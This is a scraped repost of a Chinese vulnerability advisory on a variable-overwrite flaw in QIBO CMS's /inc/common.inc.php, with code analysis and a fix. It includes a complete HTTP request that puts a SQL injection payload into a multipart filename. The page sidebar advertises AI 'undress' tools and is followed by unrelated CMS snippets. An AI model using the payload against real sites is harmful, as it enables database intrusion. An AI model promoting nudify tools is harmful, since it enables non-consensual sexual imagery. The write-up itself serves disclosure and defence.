QIBO CMS /inc/common.inc.php Local Variables Overriding Vul
目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入 " 本地变量
目录
<span>1</span><span>. 漏洞描述 </span><span>2</span><span>. 漏洞触发条件 </span><span>3</span><span>. 漏洞影响范围 </span><span>4</span><span>. 漏洞代码分析 </span><span>5</span><span>. 防御方法 </span><span>6</span>. 攻防思考
1. 漏洞描述
齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入<span>"</span><span>本地变量覆盖</span><span>"</span>、<span>"</span><span>本地变量未初始化</span><span>"</span><span>的安全风险 齐博CMS中的漏洞文件</span>/inc/common.inc.php使用 @extract($_FILES, EXTR_SKIP)来注册$_FILES的各变量,使用EXTR_SKIP来控制不覆盖已存在的变量。利用一个末初始化的变量覆盖漏洞,即可导致sql注入漏洞
Relevant Link:
http:<span>//</span><span>bbs.qibosoft.com/read-forum-tid-422299.htm</span>
2. 漏洞触发条件
0x1: 攻击入口
构造$_FILE的变量覆盖构造覆盖$cidDB变量,POST给/member/comment.php
<span>1</span>. 首先访问/member下面的<span>"</span><span>评论管理</span><span>"</span><span>功能,抓包 </span><span>2</span><span>. 在http request中构造一个attachment,如下: </span><span>/*</span><span> POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,</span><span>*/</span>*;q=<span>0.8</span><span> User</span>-Agent: Mozilla/<span>5.0</span> (Windows NT <span>6.1</span>; WOW64) AppleWebKit/<span>537.36</span> (KHTML, like Gecko) Chrome/<span>28.0</span>.<span>1500.95</span> Safari/<span>537.36</span> SE <span>2</span>.X MetaSr <span>1.0</span><span> Referer: http:</span><span>//</span><span>127.0.0.1/qibo/member/comment.php?job=work </span> Accept-<span>Encoding: gzip,deflate,sdch Accept</span>-Language: zh-CN,zh;q=<span>0.8</span><span> Cookie: PHPSESSID</span>=<span>jo9rpav7l51iakidv01vr9fem1; passport</span>=<span>1</span>%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%<span>0922</span>%<span>091425969668</span>%09http%3A%2F%2F127.<span>0.0</span>.<span>1</span>%2Fqibo%2Fmember%2Fcomment.php%3Fjob%<span>3Dwork Content</span>-Type: multipart/form-<span>data; boundary</span>=----<span>WebKitFormBoundary6ukpBHoIrpHKtOkl Content</span>-Length: <span>227</span> ------<span>WebKitFormBoundary6ukpBHoIrpHKtOkl Content</span>-Disposition: form-data; name=<span>"</span><span>cidDB</span><span>"</span>; filename=<span>"</span><span>1' and EXP(~(select * from(select user())a)) -- </span><span>"</span><span> Content</span>-Type: text/<span>plain </span><span>1111</span> ------WebKitFormBoundary6ukpBHoIrpHKtOkl-- */<span> 注意将原来的URL上的cidDB[]</span>=<span>x删除掉; 然后构造一个文件上传的报文(GET改为POST方法) 在filename处填入注入的payload </span><span>3</span><span>. 提交该数据包,即可注入成功 </span><span>//</span><span>这次的变量覆盖是抓住了extract的EXTR_SKIP只检查已经存在的变量,但是有些没有声明的变量还是会被覆盖</span>
Relevant Link:
http:<span>//</span><span>bobao.360.cn/learning/detail/291.html</span>
3. 漏洞影响范围
齐博所有系统、所有版本
4. 漏洞代码分析
\qibo\inc\common.inc.php
<span>/*</span><span> 全局变量文件对GPC变量的过滤 从代码中可以看淡,通过$_FILE传的值,POST的内容受GPC影响,因此只能利用$_FILE变量的$key绕过add_S函数 这里,$_FILS在传递参数时,是数组形式,因此可以默认使用$_FILES的$key去覆盖 </span><span>*/</span><span> $_POST</span>=<span>Add_S($_POST); $_GET</span>=<span>Add_S($_GET); $_COOKIE</span>=<span>Add_S($_COOKIE); function Add_S($array) { </span><span>foreach</span>($array <span>as</span> $key=><span>$value) { </span><span>if</span>(!<span>is_array($value)) { $value</span>=str_replace(<span>"</span><span></span><span>"</span>,<span>"</span><span>& # x</span><span>"</span>,$value); <span>//</span><span>过滤一些不安全字符</span> $value=preg_replace(<span>"</span><span>/eval/i</span><span>"</span>,<span>"</span><span>eva l</span><span>"</span>,$value); <span>//</span><span>过滤不安全函数</span> !get_magic_quotes_gpc() && $value=<span>addslashes($value); $array[$key]</span>=<span>$value; } </span><span>else</span><span> { $array[$key]</span>=<span>Add_S($array[$key]); } } </span><span>return</span><span> $array; } </span><span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>)) { @extract($_FILES,EXTR_SKIP); } </span><span>foreach</span>($_COOKIE AS $_key=><span>$_value) { unset($$_key); } </span><span>foreach</span>($_POST AS $_key=><span>$_value) { </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_POST[$_key]; } </span><span>foreach</span>($_GET AS $_key=><span>$_value) { </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_GET[$_key]; }</span>
5. 防御方法
\qibo\inc\common.inc.php
<span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>)) { $array </span>= array(<span>'</span><span>Filedata</span><span>'</span>,<span>'</span><span>postfile</span><span>'</span>,<span>'</span><span>upfile</span><span>'</span>,<span>'</span><span>fileData</span><span>'</span>,<span>'</span><span>Filedata</span><span>'</span><span>); </span><span>foreach</span>($array AS $key=><span>$value) { is_array($_FILES[$value]) </span>&& $$value =<span> $_FILES[$value]; } }</span>
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved

Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

Notepad++7.3.1
Easy-to-use and free code editor

SublimeText3 Chinese version
Chinese version, very easy to use

Zend Studio 13.0.1
Powerful PHP integrated development environment

Dreamweaver CS6
Visual web development tools

SublimeText3 Mac version
God-level code editing software (SublimeText3)

Hot Topics

The benefits brought by the integration of PHP framework and CMS are: 1. Improve development efficiency; 2. Enhance security; 3. Simplify content management; 4. Flexibility. In a practical case, the Laravel framework was integrated with WordPressCMS to create a blog website with customized functions. The integration steps include creating a Laravel application, installing WordPress, configuring WordPress, creating a controller, defining routing, obtaining WordPress data, and in the Laravel view Display Data.

With the popularity and development of the Internet, financial websites have become more and more important. Financial websites play a decisive role in the financial industry's business development, marketing and brand building, etc. Nowadays, with the popularity and maturity of CMS systems, more and more companies are beginning to choose to use CMS systems for website development. This article will focus on how to use the PHPCMS system in developing financial websites. 1. Understand the CMS system. CMS system is the abbreviation of content management system. It refers to a system that can quickly create

How to use Java to write the data synchronization module of a CMS system Introduction: With the development of the information age and the popularity of the Internet, content management systems (CMS) have been widely used in all walks of life. Among different user groups, content management requires the synchronization of multiple data sources, which requires an efficient and reliable data synchronization module. This article will introduce how to use Java to write the data synchronization module of the CMS system and provide relevant code examples. 1. Overview Data synchronization refers to the transfer of data between multiple data sources.

The location of the Empire CMS directory is revealed. Specific code examples are needed. Empire CMS (EmpireCMS) is a widely used open source content management system. Its flexibility and feature richness are loved by users. During the website development process, it is crucial to understand the directory structure and file location of Empire CMS, as this helps developers better manage website content and functions. This article will reveal the directory location of Empire CMS and provide specific code examples to help readers gain a deeper understanding of this content management system. 1.Basic directory structure

PHPcms is a powerful content management system that is widely used in website development. Column caching is an important function in PHPcms, which can improve website access speed and reduce server pressure. This article will reveal the storage path of the PHPcms column cache and provide specific code examples. 1. What is column caching? Column caching refers to generating static files from the column content in the website and storing them in the specified path. When the user accesses the column, the static file is directly read instead of dynamically generating the page every time. this

Build a PHP cloud transcoding CMS system to implement video transcoding services. With the rapid development of online videos, video transcoding services have become more and more important. In order to meet users' needs for video transcoding, building a PHP cloud transcoding CMS system is a good choice. In this article, we will introduce how to build a simple PHP cloud transcoding CMS system and provide specific code examples. First, we need to prepare a basic PHP development environment. Make sure you have PHP and MySQL installed and have a web server such as Apa

How to use Java to implement the picture watermark function of the CMS system Summary: Adding the picture watermark function to the CMS system can effectively prevent pictures from being tampered with and stolen. This article will introduce how to use Java to implement the image watermark function of the CMS system and provide code examples. Introduction With the popularity of the Internet and the popularity of digital cameras, the theft and tampering of pictures has become a common problem. In order to protect the copyright of images, many CMS systems will add image watermark functions. Image watermarking is a technology that adds some identifiable information to images, such as

The impact and response of when PHPcms will stop maintenance. With the continuous development of Internet technology, website construction has become an essential tool for many companies and individuals. In website construction, the content management system (CMS) plays an important role. As a commonly used CMS tool, PHPcms was once very popular. However, as time goes by, the update and maintenance of the PHPcms version gradually decreases or even stops maintenance, which brings a series of impacts to users and developers. This article will explore the impact of PHPcms out of maintenance and provide a
